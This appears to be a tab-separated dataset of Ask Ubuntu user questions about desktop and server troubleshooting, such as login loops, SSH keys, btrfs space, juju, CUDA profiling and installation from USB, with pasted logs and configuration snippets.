278762	ubuntu 12.04 login returns to login	this is not a resolution issue , i am on a netbook , that has been working fine for years , i have no nvidia graphics , guest user works just fine with the existing graphics and adding a new user has worked just fine with the existing graphics . i 've tried all but one of the answers in the resolution ( create new user and copy everything over , workaround ) . 12.04 installed on my dell notebook . has been running just great for ages , prior to 12.04 it was running the previous lts ubuntu since mid2010 . everything worked just fine . yesterday could not login from the greeter screen , lightdm . login name/password is accepted but after a second or so returns to login screen . i can login a guest session just fine and all works ok there , unity working well , no graphic problems , all o.k.. and when there using ctrl/alt/f1 get to a prompt and login to cli also just fine , see all my files in the encryptfs home directory , so password is ok. because all is ok on the new account and the guest session i do n't think there is a problem with xorg.conf . i 've deleted .xauthority , no joy . my home folder has the correct permissions drwxr-xr-x and owned by me . the wallpaper is owned by me but readable by all . my hard disc , whilst quite full , still has over 5gb available df -h i 've tried sudo dpkg -- configure -a ; and sudo apt-get update ; i do n't want to upgrade from 12.04 . i dont have nvidia so am not going to try their drivers . the existing driver works fine on the new account . i do n't want to follow the password reset procedure as the password is not a problem , works fine on tty and no invalid password message comes when i try gui login . i suspect that there is something amiss with gdm , perhaps a permissions issue when logging in as myself . here is :0-greeter.log gnome-session [ 2146 ] : warning : failed to start app : unable to start application : failed to execute child process `` /usr/lib/at-spi/at-spi-registryd '' ( no such file or directory ) ( gnome-settings-daemon:2152 ) : color-plugin-warning ** : failed to create directory on startup : error creating directory : permission denied gnome-session [ 2146 ] : warning : failed to start app : unable to start application : failed to execute child process `` gnome-power-manager '' ( no such file or directory ) ( gnome-settings-daemon:2152 ) : color-plugin-warning ** : failed to create profile from edid data : error creating directory : permission denied ( gnome-settings-daemon:2152 ) : color-plugin-warning ** : failed to create profile from edid data : error creating directory : permission denied gdm-simple-greeter [ 2177 ] : gtk-warning : overriding tab label for notebook gdm-simple-greeter [ 2177 ] : gtk-warning : overriding tab label for notebook gdm-simple-greeter [ 2177 ] : gtk-warning : overriding tab label for notebook gdm-simple-greeter [ 2177 ] : gtk-warning : overriding tab label for notebook gdm-simple-greeter [ 2177 ] : gtk-warning : overriding tab label for notebook gdm-simple-greeter [ 2177 ] : gtk-warning : /build/buildd/gtk+3.0-3.4.2/./gtk/gtkwidget.c:7117 : widget not within a gtkwindow gdm-simple-greeter [ 2177 ] : gtk-critical : gtk_widget_get_preferred_height_for_width : assertion `width > = 0 ' failed gdm-simple-greeter [ 2177 ] : gtk-critical : gtk_widget_get_preferred_height_for_width : assertion `width > = 0 ' failed gdm-simple-greeter [ 2177 ] : gtk-warning : gtk_widget_size_allocate ( ) : attempt to allocate widget with width -47 and height -47 window manager warning : buggy client sent a _net_active_window message with a timestamp of 0 for 0x1000007 ( login wind ) window manager warning : meta_window_activate called by a pager with a 0 timestamp ; the pager needs to be fixed . gdm-simple-greeter [ 2177 ] : gtk-critical : gtk_widget_get_preferred_height_for_width : assertion `width > = 0 ' failed gdm-simple-greeter [ 2177 ] : gtk-critical : gtk_widget_get_preferred_height_for_width : assertion `width > = 0 ' failed gdm-simple-greeter [ 2177 ] : gtk-warning : gtk_widget_size_allocate ( ) : attempt to allocate widget with width -47 and height -47 gdm-simple-greeter [ 2177 ] : critical : get_column_number : assertion `i < gtk_tree_view_get_n_columns ( treeview ) ' failed gdm-simple-greeter [ 2177 ] : critical : get_column_number : assertion `i < gtk_tree_view_get_n_columns ( treeview ) ' failed window manager warning : buggy client sent a _net_active_window message with a timestamp of 0 for 0x1000007 ( login wind ) window manager warning : meta_window_activate called by a pager with a 0 timestamp ; the pager needs to be fixed . window manager warning : buggy client sent a _net_active_window message with a timestamp of 0 for 0x1000007 ( login wind ) window manager warning : meta_window_activate called by a pager with a 0 timestamp ; the pager needs to be fixed . window manager warning : buggy client sent a _net_active_window message with a timestamp of 0 for 0x1000007 ( login wind ) window manager warning : meta_window_activate called by a pager with a 0 timestamp ; the pager needs to be fixed . window manager warning : buggy client sent a _net_active_window message with a timestamp of 0 for 0x1000007 ( login wind ) window manager warning : meta_window_activate called by a pager with a 0 timestamp ; the pager needs to be fixed . window manager warning : currenttime used to choose focus window ; focus window may not be correct . window manager warning : got a request to focus the no_focus_window with a timestamp of 0 . this should n't happen ! ** ( gnome-settings-daemon:2152 ) : warning ** : name taken or bus went away - shutting down g_dbus_connection_real_closed : remote peer vanished with error : underlying giostream returned 0 bytes on an async read ( g-io-error-quark , 0 ) . exiting . gdm-simple-greeter [ 2177 ] : gdk-warning : gdm-simple-greeter : fatal io error 11 ( resource temporarily unavailable ) on x server :0 . ( gnome-settings-daemon:2152 ) : libappindicator-warning ** : unable to send signal for newstatus : the connection is closed ( gnome-settings-daemon:2152 ) : gdk-warning ** : gnome-settings-daemon : fatal io error 0 ( success ) on x server :0 . here 's a section from lightdm.log [ +11.23s ] debug : started session 1830 with service 'lightdm ' , username 'chris' [ +11.25s ] debug : session 1830 got 1 message ( s ) from pam [ +11.25s ] debug : prompt greeter with 1 message ( s ) [ +13.58s ] debug : continue authentication [ +18.58s ] debug : session 1830 authentication complete with return value 0 : success [ +18.58s ] debug : authenticate result for user chris : success [ +18.62s ] debug : user chris authorized [ +18.64s ] debug : greeter requests session ubuntu-2d [ +18.64s ] debug : using session ubuntu-2d [ +18.64s ] debug : stopping greeter [ +18.64s ] debug : session 1168 : sending sigterm [ +18.77s ] debug : session 1168 exited with return value 0 [ +18.77s ] debug : greeter quit [ +18.82s ] debug : dropping privileges to uid 1000 [ +18.82s ] debug : restoring privileges [ +18.89s ] debug : dropping privileges to uid 1000 [ +18.89s ] debug : writing /home/chris/.dmrc [ +18.89s ] debug : restoring privileges [ +18.98s ] debug : starting session ubuntu-2d as user chris [ +18.98s ] debug : session 1830 running command /usr/sbin/lightdm-session gnome-session -- session=ubuntu-2d [ +19.12s ] debug : registering session with bus path /org/freedesktop/displaymanager/session0 [ +19.12s ] debug : greeter closed communication channel [ +22.35s ] debug : session 1830 exited with return value 0 [ +22.35s ] debug : user session quit [ +22.35s ] debug : stopping display the bit around 19s interests me , an ubuntu-2d session starts and then vary rapidly exits . here 's /var/log/lightgm/x-0-greeter.log activating service name='org.a11y.atspi.registry' [ +0.00s ] debug : unity-greeter.vala:895 : starting unity-greeter 0.2.9 uid=118 lang=en_gb.utf-8 [ +0.00s ] debug : unity-greeter.vala:898 : setting cursor [ +0.00s ] debug : unity-greeter.vala:902 : creating background surface [ +0.00s ] debug : unity-greeter.vala:905 : loading command line options [ +0.00s ] debug : unity-greeter.vala:933 : setting gtk+ settings successfully activated service 'org.a11y.atspi.registry' ** ( at-spi2-registryd:1979 ) : warning ** : failed to register client : gdbus.error : org.freedesktop.dbus.error.serviceunknown : the name org.gnome.sessionmanager was not provided by any .service files ** ( at-spi2-registryd:1979 ) : warning ** : unable to register client with session manager [ +0.16s ] debug : unity-greeter.vala:956 : creating unity greeter [ +0.16s ] debug : connecting to display manager ... [ +0.16s ] debug : wrote 17 bytes to daemon [ +0.16s ] debug : read 8 bytes from daemon [ +0.16s ] debug : read 120 bytes from daemon [ +0.16s ] debug : connected version=1.2.3 default-session=ubuntu show-manual-login=false hide-users=false has-guest-account=true [ +0.45s ] debug : menubar.vala:318 : lang=en_gb.utf-8 language= ( null ) [ +0.49s ] critical : g_error_free : assertion `error ! = null ' failed [ +0.51s ] debug : get entries [ +0.51s ] debug : menubar.vala:511 : adding indicator object 0x84d41ec at position 0 [ +0.53s ] debug : evaluating bitmask for ' % h : % m' [ +0.53s ] debug : checking against 1 possible times [ +0.57s ] debug : guessing max time width : 36 [ +0.57s ] debug : get entries [ +0.57s ] debug : menubar.vala:511 : adding indicator object 0x853101c at position 1 [ +0.58s ] warning : indicatorobject class does not have an accessible description . [ +0.62s ] warning : indicatorobject class does not have an accessible description . [ +0.62s ] debug : get entries [ +0.62s ] debug : get entries [ +0.62s ] debug : menubar.vala:511 : adding indicator object 0x844cd2c at position 2 [ +0.62s ] debug : menubar.vala:335 : lang=en_gb.utf-8 language= ( null ) [ +0.66s ] debug : loaded session /usr/share/xsessions/ubuntu-2d.desktop ( ubuntu 2d , this session logs you into ubuntu 2d mode ) [ +0.66s ] debug : ignoring session /usr/share/xsessions/gnome-shell.desktop [ +0.66s ] debug : loaded session /usr/share/xsessions/xterm.desktop ( recovery console , failsafe session with only xterm ) [ +0.66s ] debug : loaded session /usr/share/xsessions/ubuntu.desktop ( ubuntu , this session logs you into ubuntu ) [ +0.66s ] debug : ignoring session /usr/share/xsessions/gnome.desktop [ +0.66s ] debug : loaded session /usr/share/xsessions/xsession.desktop ( user defined session , custom ~/.xsession script ) [ +0.66s ] debug : session-chooser.vala:42 : adding session xterm ( recovery console ) [ +0.67s ] debug : session-chooser.vala:42 : adding session ubuntu ( ubuntu ) [ +0.67s ] debug : session-chooser.vala:42 : adding session ubuntu-2d ( ubuntu 2d ) [ +0.67s ] debug : session-chooser.vala:42 : adding session xsession ( user defined session ) [ +1.38s ] debug : setting keyboard layout to 'gb' [ +1.49s ] debug : main-window.vala:98 : screen is 800x600 pixels [ +1.49s ] debug : main-window.vala:104 : monitor 0 is 800x600 pixels at 0,0 [ +1.49s ] debug : main-window.vala:104 : monitor 1 is 800x600 pixels at 0,0 [ +1.51s ] debug : loading users from org.freedesktop.accounts [ +1.51s ] debug : loading user /org/freedesktop/accounts/user1000 [ +1.57s ] debug : loading user /org/freedesktop/accounts/user1001 [ +1.65s ] debug : loading sessions from org.freedesktop.displaymanager [ +1.65s ] debug : unity-greeter.vala:332 : adding/updating user chris ( chris ) [ +1.65s ] debug : unity-greeter.vala:332 : adding/updating user guest ( guest ) [ +1.65s ] debug : unity-greeter.vala:189 : adding guest account entry [ +1.70s ] debug : starting authentication for user chris ... [ +1.70s ] debug : wrote 21 bytes to daemon [ +1.70s ] debug : unity-greeter.vala:959 : showing greeter [ +1.70s ] debug : unity-greeter.vala:357 : showing main window [ +1.71s ] debug : new style for time label [ +1.72s ] debug : evaluating bitmask for ' % h : % m' [ +1.72s ] debug : checking against 1 possible times [ +1.72s ] debug : guessing max time width : 36 [ +1.77s ] debug : background.vala:315 : regenerating backgrounds [ +1.77s ] debug : background.vala:67 : making background /usr/share/backgrounds/warty-final-ubuntu.png at 800x600 [ +1.78s ] debug : new style for time label [ +1.78s ] debug : evaluating bitmask for ' % h : % m' [ +1.78s ] debug : checking against 1 possible times [ +1.78s ] debug : guessing max time width : 36 [ +1.79s ] debug : unity-greeter.vala:972 : starting main loop [ +1.79s ] debug : read 8 bytes from daemon [ +1.79s ] debug : read 35 bytes from daemon [ +1.79s ] debug : prompt user with 1 message ( s ) [ +2.04s ] debug : background.vala:67 : making background /home/chris/pictures/steelends.jpg at 800x600 [ +2.04s ] debug : background.vala:144 : error loading background : failed to open file '/home/chris/pictures/steelends.jpg ' : permission denied [ +2.07s ] debug : num devices : '2' [ +2.07s ] debug : get_primary_device : got data from object /org/freedesktop/upower/devices/line_power_acad [ +2.07s ] debug : get_primary_device : got data from object /org/freedesktop/upower/devices/battery_bat1 [ +2.07s ] debug : put_primary_device : got data from object /org/freedesktop/upower/devices/battery_bat1 [ +2.07s ] debug : set_accessible_desc : setting accessible description to 'battery ( charged ) ' [ +2.07s ] debug : num devices : '2' [ +2.07s ] debug : menu_add_device : got data from object /org/freedesktop/upower/devices/line_power_acad [ +2.07s ] debug : menu_add_device : got data from object /org/freedesktop/upower/devices/battery_bat1 [ +2.08s ] debug : icon_policy is : 0 ( present==0 , charge==1 , never==2 ) [ +2.08s ] debug : count_batteries found 1 batteries ( 0 are charging/discharging ) [ +2.08s ] debug : should_be_visible : yes [ +2.08s ] debug : refresh_entry_accessible_desc : setting entry 0x844ccd4 accessible description to 'battery ( charged ) ' [ +2.08s ] debug : get entries [ +2.08s ] debug : get entries [ +2.08s ] debug : get entries [ +2.08s ] debug : menubar.vala:511 : adding indicator object 0x844ccd4 at position 2 [ +2.09s ] warning : getting layout failed : gdbus.error : org.freedesktop.dbus.error.unknownmethod : no such interface `com.canonical.dbusmenu ' on object at path /com/canonical/indicator/users/menu [ +2.16s ] debug : setting keyboard layout to 'gb' [ +2.33s ] debug : notify visible signal received [ +2.33s ] critical : ido_calendar_menu_item_set_date : assertion `ido_is_calendar_menu_item ( menuitem ) ' failed [ +2.35s ] debug : new calendar item [ +2.37s ] debug : indicator-sound : new_volume_slider_widget [ +2.39s ] debug : indicator-sound : new_voip_slider_widget [ +2.50s ] debug : unity-greeter.vala:315 : starting system-ready sound [ +2.60s ] debug : background.vala:116 : render of background /home/chris/pictures/steelends.jpg complete [ +2.60s ] critical : background_loader_create_pattern : assertion `image ! = null ' failed [ +2.62s ] debug : background.vala:116 : render of background /usr/share/backgrounds/warty-final-ubuntu.png complete thanks nerof61 tried sudo chown -r chris : chris /home/chris some errors chown : changing ownership of '/home/chris/.cache/compizconfig-1/staticswitcher.pb ' : input/output error chown : changing ownership of '/home/chris/compiz-1/session/10d1c ... ... ... ' : input/output error logging in still has the same issue , no change . looking at both these files , they are both owned chris : chris , 0 bytes long and both were last modified two days ago when the machine was last working correctly . i 'll have a think about this , perhaps i should re-install compiz . i 've been thinking around problems with x . checked /hoe/chris/.xsession-errors , not aa lot of help to me , hopefully someone can point me the right way ? openconnection : connect : no such file or directory can not connect to br1tty at : 0 /home/chris/gnupg/gpg-agent-info-chris-laptop : syntax error . ' ( ' unexpected will add more as i find it . i 've tried adding a user , john , from the tty . once done , i then re-booted and tried to login , exactly the same issues even with john , password accepted then kicked back to login screen virtually straight away . i 'm still ok with a guest session though and no issues with ctrl/alt/f1 later . i notice that the home directory for the new user , john , is owned by root . using sudo chown john : john john i changed the ownership of the home directory . now i can log in just as normal as john so making some progress . i 'm really struggling with this and any help appreciated .
278772	will i be okay if i use usb-stick with 1.87 gb of free space to install ubuntu 12.10 ?	i want to install ubuntu 12.10 from a usb-stick , but there 's only 1.87gb of free space . will there be any problems with it or is it okay ?
278776	mass convert word & ppt to pdf software	is there any software to convert microsoft word and powerpoint files to pdf documents in a batch without having to open each one individually ? either a graphical or terminal method will be suitable .
278777	how to download videos from procam xr2 in ubuntu ?	can anybody help me downloading my videos from a procam camera ? it is listed in lsusb this way : polaroid corp a500 digital camera dmesg shows this : [ 13135.304931 ] usb 2-1.1 : new high-speed usb device number 10 using ehci_hcd [ 13135.399598 ] scsi13 : usb-storage 2-1.1:1.0 [ 13136.507543 ] scsi 13:0:0:0 : direct-access digital camera storage 1.00 pq : 0 ansi : 5 [ 13136.508257 ] sd 13:0:0:0 : attached scsi generic sg2 type 0 [ 13136.509449 ] sd 13:0:0:0 : [ sdc ] 15661056 512-byte logical blocks : ( 8.01 gb/7.46 gib ) [ 13136.509811 ] sd 13:0:0:0 : [ sdc ] write protect is off [ 13136.509815 ] sd 13:0:0:0 : [ sdc ] mode sense : 17 00 00 08 [ 13136.510183 ] sd 13:0:0:0 : [ sdc ] no caching mode page present [ 13136.510186 ] sd 13:0:0:0 : [ sdc ] assuming drive cache : write through [ 13136.512459 ] sd 13:0:0:0 : [ sdc ] no caching mode page present [ 13136.512464 ] sd 13:0:0:0 : [ sdc ] assuming drive cache : write through [ 13136.514075 ] sdc : sdc1 [ 13136.516448 ] sd 13:0:0:0 : [ sdc ] no caching mode page present [ 13136.516452 ] sd 13:0:0:0 : [ sdc ] assuming drive cache : write through [ 13136.516456 ] sd 13:0:0:0 : [ sdc ] attached scsi removable disk [ 13136.535664 ] sd 13:0:0:0 : [ sdc ] unhandled sense code [ 13136.535668 ] sd 13:0:0:0 : [ sdc ] result : hostbyte=invalid driverbyte=driver_sense [ 13136.535672 ] sd 13:0:0:0 : [ sdc ] sense key : medium error [ current ] [ 13136.535677 ] sd 13:0:0:0 : [ sdc ] add . sense : unrecovered read error [ 13136.535682 ] sd 13:0:0:0 : [ sdc ] cdb : read ( 10 ) : 28 00 00 ee f7 f0 00 00 08 00 [ 13136.535692 ] end_request : critical target error , dev sdc , sector 15661040 [ 13136.535695 ] quiet_error : 293 callbacks suppressed [ 13136.535698 ] buffer i/o error on device sdc , logical block 1957630 tried googling it , but with no luck . can someone help ?
278783	postfix smtp server : emails not being queued for retry when greylisted [ submission by email clients ]	i have recently configured my own postfix server , however there is one thing left that 's stumping me . when sending emails via thunderbird to a server with greylisting enabled , i am instantly receiving a message stating that it is unable to send , rather than be put into a queue and attempt to send later . i assume this would also have ramifications if i try to send to an email server that 's having issues .
278787	how to recover files lost after reinstalling ubuntu ?	i had a few issues on ubuntu that i did not know how to solve . this included not being unable to boot . i discovered that i could reinstall ubuntu from an usb pendrive . it has been said that the files would be safe if i reinstalled and used the same username and password . i did that but all my files are missing . how do i recover my files ?
278791	revert from dark nimbus theme to default in netbeans	i installed the dark nimbus theme in netbeans ' plugin manager . now theme has changed but i do not like it . i uninstalled it from plugin manager . but nothing happened . what can i do ?
278792	poor-quality video playback from youtube	i have compiled from source codes player vlc 2.0.5 the build succeeds . but when playing video from youtube playlists , i get problems . some videos are played perfectly . others - no . bad http : //www.youtube.com/watch ? v=lm0ee-ba9z0 & list=plg1pjqrqs6gcek7bbmchlducco_o98hpv & index=1 http : //farm03.photoload.ru/data/89/d2/66/89d266657a65bb9cb8de7752ca674a28.png ? h=vdg86lmei_5rgix5eveqoa & t=1365333289 perfectly http : //farm03.photoload.ru/data/fe/61/86/fe6186866ab4d4dd236b01a8b89cd6cd.png ? h=2g7sy3xnjw12swtf0optjg & t=1365333363 http : //www.youtube.com/watch ? v=bwjgyfvz2oa prompt please the reason .
278805	where is unity launcher	i have just installed ubuntu 12.04 using wubi . it gets installed successfully but now i am only able to see an empty desktop . i could not find any softwares anywhere in home etc , no where . where are firefox and all other softwares ? i clicked ubuntu help and it says about launcher but i do n't have it how to get that ?
278806	how to install packages to /opt or any other folder instead of their original path ?	some packages , like adobe reader and netbeans , allow installation to /opt folder for global use . however , what should i do to install regular applications to the /opt folder ? do i have an option to install applications in any folder i want like windows ?
278807	ca n't remember password in nautilus for sftp	why is it not possible to remember passwords in nautilus for sftp ? it works great for ftp with passwords stored with seahorse . how i can solve this ?
278808	is there an official ubuntu phone manufacturer ?	is there any phone running ubuntu ? if so please tell me where i can get one .
278809	can not ssh into kubuntu box without password	i am trying to set password-less logins to my desktop from my server so that a bash script on the server could scp backups over to the desktop . the desktop is running kubuntu 12.10 , and the server is running some redhat derivative . my desktop 's ip address does not change ( not on the big bad internet , and not on the lan ) . i can ssh in from the server to the desktop just fine : [ remote ] $ ssh backup @ my-ip-address backup @ my-ip-address 's password : welcome to ubuntu 12.10 ( gnu/linux 3.5.0-25-generic x86_64 ) ... [ dotandesktop ] $ exit connection to my-ip-address closed . [ remote ] $ i have scped the .ssh/id_rsa.pub file from the remote server to the desktop . i then cated the file into the desktop 's .ssh/authorized_keys key file with the > > append operator . i believe that i have the correct permissions for everything on the desktop : [ dotandesktop ] $ sudo ls -la | grep .ssh drwx -- -- -- 2 backupuser backupuser 4096 apr 7 13:01 .ssh [ dotandesktop ] $ ls -la .ssh total 12 drwx -- -- -- 2 backupuser backupuser 4096 apr 7 13:01 . drwxrwxr-x 7 backupuser backupuser 4096 apr 7 13:58 .. -rw -- -- -- - 1 backupuser backupuser 1211 apr 7 13:58 authorized_keys and on the server : [ remote ] $ ls -la | grep .ssh drwx -- -- -- 2 fschafer fschafer 4096 apr 7 04:05 .ssh [ remote ] $ ls -la .ssh total 24 drwx -- -- -- 2 fschafer fschafer 4096 apr 7 04:05 . drwx -- x -- x 4 fschafer fschafer 4096 apr 7 06:05 .. -rw -- -- -- - 1 fschafer fschafer 1608 feb 25 04:51 authorized_keys -rw -- -- -- - 1 fschafer fschafer 1675 apr 7 04:05 id_rsa -rw-r -- r -- 1 fschafer fschafer 405 apr 7 04:05 id_rsa.pub -rw-r -- r -- 1 fschafer fschafer 791 apr 7 04:40 known_hosts [ remote ] $ additionally , from my ssh config file : [ dotandesktop ] $ cat /etc/ssh/sshd_config | grep `` rsaauthentication\|pubkeyauthentication '' rsaauthentication yes pubkeyauthentication yes rhostsrsaauthentication no # uncomment if you do n't trust ~/.ssh/known_hosts for rhostsrsaauthentication however , when i try to ssh into the desktop from the server , it still asks me for my password . what else should i check ?
278811	btrfs : not enough free disk space , but device not fully used	i 'm using btrfs for my home directory , which spans multiple devices . in total i should have around 7.3tb of space - and that 's what df shows , but i ran out of space after using only 5.7tb of data : # df -h filesystem size used avail use % mounted on /dev/sdd3 7.3t 5.7t 63g 99 % /home btrfs has this to say for itself : # btrfs fi df /home data , raid0 : total=5.59tb , used=5.59tb system , raid1 : total=8.00mb , used=328.00kb system : total=4.00mb , used=0.00 metadata , raid1 : total=11.50gb , used=8.22gb which is weird , because there should have been enough partitions to support 7.3tb ( also , the btrfs data configuration should have been `` single '' and not raid0 ) . here is what btrfs show says : # btrfs fi show label : none uuid : 2dd4a2b6-c672-49b1-856b-3abdc12d56a5 total devices 9 fs bytes used 5.59tb devid 2 size 303.22gb used 303.22gb path /dev/sdb1 devid 3 size 303.22gb used 303.22gb path /dev/sdb2 devid 4 size 325.07gb used 324.50gb path /dev/sdb3 devid 1 size 2.73tb used 1.11tb path /dev/sdc1 devid 5 size 603.62gb used 589.05gb path /dev/sdd1 devid 6 size 632.22gb used 617.65gb path /dev/sdd2 devid 7 size 627.18gb used 612.61gb path /dev/sdd3 devid 8 size 931.51gb used 931.51gb path /dev/sde1 devid 9 size 931.51gb used 931.51gb path /dev/sde2 as you can see , devid 1 ( which is the last disk i added ) has only 1.11tb used out of 2.73tb available in the partition ( its a supposedly 3tb drive , but only 2.7tb usable : - [ ) . i 've searched far and wide but could n't figure out how to make btrfs use more of the partition . what am i missing ? notes : i 'm using ubuntu 12.04.2 with the current kernel 3.2.0-23 . this is after i 've ran btrfs fi resize max /home and btrfs fi balance /home
278821	lenovo q190 installation help	i have issues with installing ubuntu on lenovo q190 . it has no other operating system but when i put boot disc in for 12.04 , ( usb dvd drive ) it hangs . tried the disc on another laptop but no issues there . any suggestions ?
278825	how do you reorder widgets in glade ?	how can i reorder widgets in the glade widget tree ? for example , assume i have a glade application that contains this partial tree : box1 ( gtkbox ) | -- button1 ( gtkbutton ) | -- button2 ( gtkbutton ) | -- button3 ( gtkbutton ) how can i swap the position of e.g . button1 with e.g . button2 , so that button2 will be above button1 in the ui ?
278836	find source of partial upgrade dialog in 12.10	i 'm running xubuntu 12.10 and started getting the `` partial upgrade '' dialog from software updater a few weeks ago . i did some reading , and from what i understand , this can solve itself within a short time , or it might be caused by certain packages , especially ones coming from ppas . i also saw lots of advice against going through with the `` partial upgrade '' , as it would effectively do an apt-get dist-upgrade . it seems like if you just press the `` continue '' button instead of agreeing to the partial upgrade , it just upgrades what packages it 's able to . i 've done that , and ran apt-get update several times now over the past three weeks , but i 'm still getting the partial upgrade dialog every time i run software updater . i have n't run the partial upgrade because it sounds like that may upgrade my entire system to 13.04 , which i definitely do n't want . so my question is : how can i pinpoint exactly which packages are causing the problem ? is there a simple way to do this , from the command line or in synaptic or wherever ? if it 's a ppa then i 'll just remove/reinstall that , but i need to know which one it is .
278841	juju local error error could not connect before timeout	juju -v status : 2013-04-07 18:11:20,888 debug initializing juju status runtime 2013-04-07 18:11:20,902:3553 ( 0x7f739cef7700 ) : zoo_info @ log_env @ 658 : client environment : zookeeper.version=zookeeper c client 3.3.6 2013-04-07 18:11:20,903:3553 ( 0x7f739cef7700 ) : zoo_info @ log_env @ 662 : client environment : host.name=ubuntu 2013-04-07 18:11:20,903:3553 ( 0x7f739cef7700 ) : zoo_info @ log_env @ 669 : client environment : os.name=linux 2013-04-07 18:11:20,903:3553 ( 0x7f739cef7700 ) : zoo_info @ log_env @ 670 : client environment : os.arch=3.5.0-26-generic 2013-04-07 18:11:20,903:3553 ( 0x7f739cef7700 ) : zoo_info @ log_env @ 671 : client environment : os.version= # 42-ubuntu smp fri mar 8 23:18:20 utc 2013 2013-04-07 18:11:20,903:3553 ( 0x7f739cef7700 ) : zoo_info @ log_env @ 679 : client environment : user.name=alok 2013-04-07 18:11:20,903:3553 ( 0x7f739cef7700 ) : zoo_info @ log_env @ 687 : client environment : user.home=/home/alok 2013-04-07 18:11:20,903:3553 ( 0x7f739cef7700 ) : zoo_info @ log_env @ 699 : client environment : user.dir=/home/alok 2013-04-07 18:11:20,903:3553 ( 0x7f739cef7700 ) : zoo_info @ zookeeper_init @ 727 : initiating client connection , host=10.0.3.1:50094 sessiontimeout=10000 watcher=0x7f739c609700 sessionid=0 sessionpasswd= < null > context=0x3684740 flags=0 2013-04-07 18:11:20,903:3553 ( 0x7f73984cb700 ) : zoo_error @ handle_socket_error_msg @ 1579 : socket [ 10.0.3.1:50094 ] zk retcode=-4 , errno=111 ( connection refused ) : server refused to accept the client 2013-04-07 18:11:24,237:3553 ( 0x7f73984cb700 ) : zoo_error @ handle_socket_error_msg @ 1579 : socket [ 10.0.3.1:50094 ] zk retcode=-4 , errno=111 ( connection refused ) : server refused to accept the client 2013-04-07 18:11:27,573:3553 ( 0x7f73984cb700 ) : zoo_error @ handle_socket_error_msg @ 1579 : socket [ 10.0.3.1:50094 ] zk retcode=-4 , errno=111 ( connection refused ) : server refused to accept the client 2013-04-07 18:11:30,909:3553 ( 0x7f73984cb700 ) : zoo_error @ handle_socket_error_msg @ 1579 : socket [ 10.0.3.1:50094 ] zk retcode=-4 , errno=111 ( connection refused ) : server refused to accept the client traceback ( most recent call last ) : failure : txzookeeper.client.connectiontimeoutexception : could not connect before timeout 2013-04-07 18:11:30,909 error traceback ( most recent call last ) : failure : txzookeeper.client.connectiontimeoutexception : could not connect before timeout 2013-04-07 18:11:30,910 error could not connect before timeout please anyone tell me what is the problem . i generated ssh keys : ssh-keygen -t rsa and installed juju using guide on juju.ubuntu.com but still getting this error , cat .juju/environments.yaml : environments : sample : type : local control-bucket : juju-4fd5fb3fd7044bd9ac65a9c6bdc8aecd admin-secret : ffeb3c9a61e84155a04df9cf8db3e4fb default-series : precise data-dir : /home/alok/data ssl-hostname-verification : true
278845	cuda nvprof profiler in 12.04	i have the latest cuda toolkit and drivers installed on a 12.04 server . the drivers are working fine : all the nvidia sample code compiles and runs and i 've written , compiled , and run several cuda programs . the other day i went to use the new nvprof command line profiler and was greeted with the following error : error : unable to locate profiling library libcuinj64.so.5.0.35 . i double checked the cuda libraries and that specific library is in fact included in the ld_library_path . ( i used the method described here ) . running ldconfig -v shows that all the cuda libraries are loaded into ld_library_path : /usr/local/cuda-5.0/lib : libcurand.so.5.0 - > libcurand.so.5.0.35 libnpp.so.5.0 - > libnpp.so.5.0.35 libcusparse.so.5.0 - > libcusparse.so.5.0.35 libcufft.so.5.0 - > libcufft.so.5.0.35 **libcuinj32.so.5.0 - > libcuinj32.so.5.0.35** libcudart.so.5.0 - > libcudart.so.5.0.35 libnvtoolsext.so.5.0 - > libnvtoolsext.so.5.0.35 libcublas.so.5.0 - > libcublas.so.5.0.35 /usr/local/cuda-5.0/lib64 : libcurand.so.5.0 - > libcurand.so.5.0.35 libcuinj64.so.5.0 - > libcuinj64.so.5.0.35 libnpp.so.5.0 - > libnpp.so.5.0.35 libcusparse.so.5.0 - > libcusparse.so.5.0.35 libcufft.so.5.0 - > libcufft.so.5.0.35 libcudart.so.5.0 - > libcudart.so.5.0.35 libnvtoolsext.so.5.0 - > libnvtoolsext.so.5.0.35 libcublas.so.5.0 - > libcublas.so.5.0.35 the offending library is in bold . at this point the old command line compiler works fine , the compiler itself works fine , so it seems to be nvprof specific . i 'm not sure if this is ubuntu or the nvprof build provided by nvidia . does anyone have an experience with running nvprof under 12.04 or even 12.10 ? anyone seen this problem before ? i realize this is a fairly niche question but you never know . update : this problem seems to persist on ubuntu 12.04 with cuda 5.5 ( released on august 1 , 2013 ) . the fix still works , you just have to use the updated library ( see below ) .
278858	can i clone my existing ubuntu 12.10 and install to usb	i have ubuntu 12.10 installed from scratch . it is set up the way i would want to have it also for my laptop and work laptop . but rather than actually installing the os again two more times , i want to be able to clone my os onto a usb drive and run it off that rather than the computer hard disk . how can i do this ? regards -kyle .
278863	how do i set up a background image for console in ubuntu	some of you may know this from opensuse . there the console is able to have a background . is ubuntu also able to have a backround image outside the x window system ?
278865	vnc viewer on firefox web	i want to be able to connect vnc viewer with firefox using the ip number and the password from the computer that i want to see the desktop ! the problems is : i just ca n't . what do i have to install , besides java to be able to connect using firefox ? i alredy have de vncviewer installed with wine but i wanted to use de filetransfer opition that is only available when you acess it using the web vnc .
278868	how to install gnome 3.4 ( not 3.6 ) in ubuntu 12.10 ?	whenever i install gnome from software center i get gnome version 3.6 but i want to install gnome 3.4 as all my extensions and themes work on it . how to do it ? would i get gnome 3.4 if i install from software center in ubuntu 12.04 ?
278871	thoshiba l655 overheating on ubuntu 12.04	i have a thoshiba l655 laptop with intel core i5 , radeon hd5650,3gb ram.the laptop is overheating while running ubuntu 12.04.i found that it may be due to the graphics driver and installed the propritory fgrlx using jockey.but after that ubuntu wont start , the system hangs just before the login screen.i cant switch to terminal only mode even.i usually hard boot and break into the root by rewriting the grub and uninstall the driver . what are any possible solutions ? i dare not hard boot again , have done it nearly 15 times this week .
278875	can i wipe hhd and install ubuntu all from sd card ?	i have an asus eee pc running on windows xp . recently , it crashed and when it boots , it has a black screen . this is a pain , as i only wanted to turn it on so i could wipe xp and install ubuntu . is there any way i can load ubuntu on an sd card and with a program ( similar or in addition to the linux pen drive installer ) that will wipe the existing os and install ubuntu from the sd card ? there is nothing important on the computer , so i want to completely wipe everything and start from scratch .
278879	gedit shortcuts	is there a way to make my own shortcuts for terminal in gedit ? i mean , for example if i want to compile a c++ source , when i press f9 i want it to make g++ source_file.cpp ( this is only an example ) thanks !
